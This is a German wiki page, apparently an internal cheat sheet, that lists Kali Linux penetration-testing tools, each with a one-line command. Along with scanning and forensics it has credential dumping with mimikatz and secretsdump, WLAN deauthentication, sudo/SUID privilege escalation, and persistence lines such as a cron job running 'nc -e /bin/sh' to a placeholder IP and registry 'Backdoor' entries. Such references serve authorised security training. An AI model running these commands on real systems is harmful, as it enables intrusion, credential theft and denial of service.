Kali 100 Tools
Version vom 19. September 2026, 17:13 Uhr von Thomas.will (Diskussion | Beiträge) (Die Seite wurde neu angelegt: „'''Kali-Linux-Werkzeuge - Kurzreferenz (Teil 4)''' Nachschlagewerk zu haeufig genutzten Werkzeugen aus dem Bereich Penetration Testing. Alle Beispiele sind au…“)
Kali-Linux-Werkzeuge - Kurzreferenz (Teil 4)
Nachschlagewerk zu haeufig genutzten Werkzeugen aus dem Bereich Penetration Testing. Alle Beispiele sind ausschliesslich fuer autorisierte Test- und Laborumgebungen (Uebungsnetz) gedacht.
Reconnaissance und OSINT
- Sammelt E-Mail-Adressen, Subdomains und Hostnamen aus oeffentlichen Quellen
- theHarvester -d target.com -b all
- Modulares OSINT-Framework mit Metasploit-aehnlicher Konsole
- recon-ng
- Umfassende Subdomain-Enumeration
- amass enum -d domain.com
- DNS-Enumeration mit Records, Subdomains und Zonentransfer-Versuch
- dnsenum target.com
- Grafische Oberflaeche zur OSINT-Analyse und Verknuepfung von Datenpunkten
- maltego
- Informationsbeschaffung zu einer Telefonnummer
- phoneinfoga scan -n +491234567
- Prueft die Existenz eines Benutzernamens auf vielen Plattformen
- socialscan username
- Prueft, auf welchen Diensten eine E-Mail-Adresse registriert ist
- holehe -e user@example.com
- Durchsucht GitHub nach versehentlich veroeffentlichten Daten
- github-dorks -d <dork>
- Scrapt Daten von X (Twitter)
- twint -u <username>
Netzwerk-Enumeration
- Findet aktive Hosts per ARP im lokalen Netz
- netdiscover -r 192.168.1.0/24
- Zeigt die lokale ARP-Tabelle mit bekannten Nachbarn
- arp -a
- Sendet ARP-Anfragen an einen Host
- arping -c 5 <IP>
- Sehr schneller Portscan grosser Portbereiche
- masscan -p1-65535 --rate 10000 <IP>
- Schneller Scan aller 65535 TCP-Ports
- nmap -p- --min-rate=1000 -T4 <IP>
- Detailscan mit Standardskripten und Versionserkennung
- nmap -sC -sV -p 80,443 <IP>
- Einfacher Portscan mit Netcat
- nc -w 5 -zv <IP> 22-1000
- Prueft auf DNS-Zonentransfer
- dnsrecon -d target.com -t axfr
Web Exploitation
- Erkennt die auf einer Website eingesetzten Technologien
- whatweb http://target.com
- Scannt Webserver auf bekannte Schwachstellen und Fehlkonfigurationen
- nikto -h http://target.com
- Fuzzing versteckter Verzeichnisse und Dateien
- ffuf -w wordlist.txt -u http://target.com/FUZZ
- Automatisierte SQL-Injection, listet Datenbanken auf
- sqlmap -u "http://target.com/page.php?id=1" --dbs
- Erkennt XSS-Schwachstellen
- xsstrike -u "http://target.com/search.php?q=test"
Wireless und Bluetooth
- Sucht erreichbare Bluetooth-Geraete
- hcitool scan
- Ping an ein Bluetooth-Geraet
- l2ping -c 5 <device_MAC>
- Scannt nach Bluetooth-Geraeten in der Umgebung
- btscanner
- Aktiviert das Bluetooth-Interface
- hciconfig hci0 up
- Setzt die WLAN-Sendeleistung (regulatorisch begrenzt)
- iwconfig wlan0 txpower 30
- Zeichnet WPA-Handshakes bzw. PMKID auf
- hcxdumptool -o capture.pcapng -i wlan0mon
- Bruteforce eines aufgezeichneten WPA-Handshakes
- aircrack-ng -b <BSSID> -w wordlist.txt handshake.cap
- Framework fuer MITM-Angriffe im WLAN
- bettercap -iface wlan0
- Sendet Deauthentifizierungs-Pakete an ein Netz
- aireplay-ng -0 10 -a <BSSID> wlan0mon
- Deauthentifiziert alle Clients (Denial of Service)
- mdk4 wlan0mon d
Windows, SMB und Active Directory
- Verbindet sich als Gast mit einer SMB-Freigabe
- smbclient -U "guest" //<target_IP>/share
- Listet erreichbare SMB-Freigaben und Rechte
- smbmap -H <target_IP>
- Enumeriert SMB-Freigaben, Benutzer und Gruppen
- enum4linux -a <target_IP>
- SMB-Enumeration und Test von Zugangsdaten
- crackmapexec smb <IP> -u user -p password
- Verbindet sich mit dem RPC-Dienst fuer Benutzer- und Gruppenabfragen
- rpcclient -U "Administrator" <target_IP>
- Listet Domaenenbenutzer
- net user /domain
- Findet die Domaenencontroller
- nltest /dclist:domain.com
- Sammelt AD-Enumerationsdaten fuer BloodHound
- bloodhound-python -c All -d domain.com -u user -p pass
- Extrahiert Windows-Passworthashes (Impacket)
- secretsdump.py <user>@<target_IP>
- Fuehrt Befehle remote per WMI aus (Impacket)
- wmiexec.py <domain>/<user>:<password>@<target>
- Liest Windows-Anmeldedaten aus dem Speicher
- mimikatz "privilege::debug" "sekurlsa::logonpasswords"
- Fordert SPN-Tickets zum Offline-Cracken an (Kerberoasting)
- kerberoast -u <user> -p <password> -d <domain>
Cloud-Pentesting
- Richtet die AWS-CLI mit Zugangsdaten und Region ein
- aws configure
- Zeigt die aktuelle AWS-Identitaet
- aws sts get-caller-identity
- Listet die IAM-Benutzer
- aws iam list-users
- Listet erreichbare S3-Buckets
- aws s3 ls
- Listet gespeicherte Secrets
- aws secretsmanager list-secrets
- Sucht oeffentliche Cloud-Ressourcen ueber AWS, Azure und GCP
- cloud_enum -k <keyword>
- Prueft die Berechtigungen eines S3-Buckets
- s3scanner -b <bucket_name>
- Sucht in Repositories nach versehentlich veroeffentlichten Secrets
- trufflehog --regex --entropy=True --max_depth=10 https://github.com/repo.git
- Zeigt aktive Google-Cloud-Anmeldungen
- gcloud auth list
- Meldet an der Azure-CLI an
- az login
Privilege Escalation (Linux)
- Zeigt, welche Befehle der Benutzer per sudo ausfuehren darf
- sudo -l
- Findet SUID-Binaries
- find / -perm -4000 -type f 2>/dev/null
- Findet Dateien mit gesetzten Capabilities
- getcap -r / 2>/dev/null
- Zeigt die Capabilities des aktuellen Prozesses
- capsh --print
- Prueft die secure_path-Konfiguration von sudo
- strings /usr/bin/sudo | grep secure_path
- Zeigt als root laufende Prozesse
- ps aux | grep root
- Zeigt die Kernel-Version als Ausgangspunkt fuer die Suche nach bekannten Luecken
- uname -a
- Identifiziert die Distribution
- cat /etc/issue
- Nutzt fehlkonfigurierte Python-Capabilities zur Rechteausweitung
- python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
- Fuehrt ein Skript mit root-Rechten aus, wenn sudo fuer python freigegeben ist
- echo 'import os; os.system("/bin/bash")' > /tmp/script.py && sudo python3 /tmp/script.py
Post-Exploitation und Persistenz
- Erzeugt eine Windows-Reverse-Shell-Payload
- msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe > shell.exe
- Legt eine geplante Aufgabe als Persistenz an (Windows)
- schtasks /create /tn "Backdoor" /tr "..." /sc onstart /ru system
- Traegt ein Programm in den Autostart der Registry ein
- reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\path\to\file.exe"
- Aendert die Dateiberechtigungen unter Windows
- icacls C:\Users\Public\file.exe /grant Everyone:F
- Fuehrt einen Befehl per WMIC aus
- wmic process call create "..."
- Fuehrt eine HTA-Payload aus
- Reverse Shell ueber PowerShell
- powercat -c <IP> -p 4444 -e cmd
- Legt eine SUID-Shell an (setzt root-Rechte voraus)
- cp /bin/bash /tmp/bash && chmod +s /tmp/bash
- Reverse Shell per Cronjob
- echo '*/5 * * * * nc -e /bin/sh <IP> 4444' | crontab -
- Aktiviert Persistenz in Meterpreter
- persistence -U -i 30 -p 4444 -r
Social Engineering und Phishing
- Startet das Social-Engineering Toolkit (SET)
- setoolkit
- Automatisiert Phishing-Kampagnen anhand fertiger Vorlagen
- zphisher
Forensik und Steganografie
- Zeigt und bearbeitet Metadaten von Dateien
- exiftool image.jpg
- Erkennt und extrahiert eingebettete Daten aus Dateien
- binwalk -e image.png
- Extrahiert lesbaren Text aus Binaerdateien
- strings file.bin
- File Carving zur Wiederherstellung geloeschter Dateien
- foremost -i disk.img -o output/
- Stellt geloeschte Dateien von einem Datentraeger wieder her
- photorec /dev/sdb
- Erstellt effizient ein Abbild eines Datentraegers
- bmaptool copy /dev/sda image.img
- Extrahiert Artefakte wie E-Mails und URLs aus einem Abbild
- bulk_extractor -o output/ disk.img
- Analysiert Windows-Speicherabbilder
- volatility -f memory.img --profile=Win10 pslist
- Analysiert Steganografie in PNG- und BMP-Dateien
- zsteg image.png
- Erkennt Steganografie in JPEGs
- stegdetect -s image.jpg
Sonstige nuetzliche Werkzeuge
- Interaktiver Prozess- und Ressourcenmonitor als Alternative zu top
- htop
- Terminal-Multiplexer fuer mehrere Sessions und Fenster
- tmux
- Grafischer Netzwerk-Sniffer und Analyzer
- wireshark
- Leitet den Verkehr eines Programms ueber Proxys bzw. Tor
- proxychains firefox
- Installiert die Impacket-Bibliothek mit Werkzeugen fuer Windows-Protokolle
- pip install impacket
- Aktiviert IP-Forwarding, etwa fuer MITM-Szenarien
- echo 1 > /proc/sys/net/ipv4/ip_forward
- Oeffnet ein Terminal und fuehrt einen Befehl aus
- gnome-terminal -- bash -c 'befehl; exec bash'
- Beendet die aktuelle Shell-Sitzung
- exit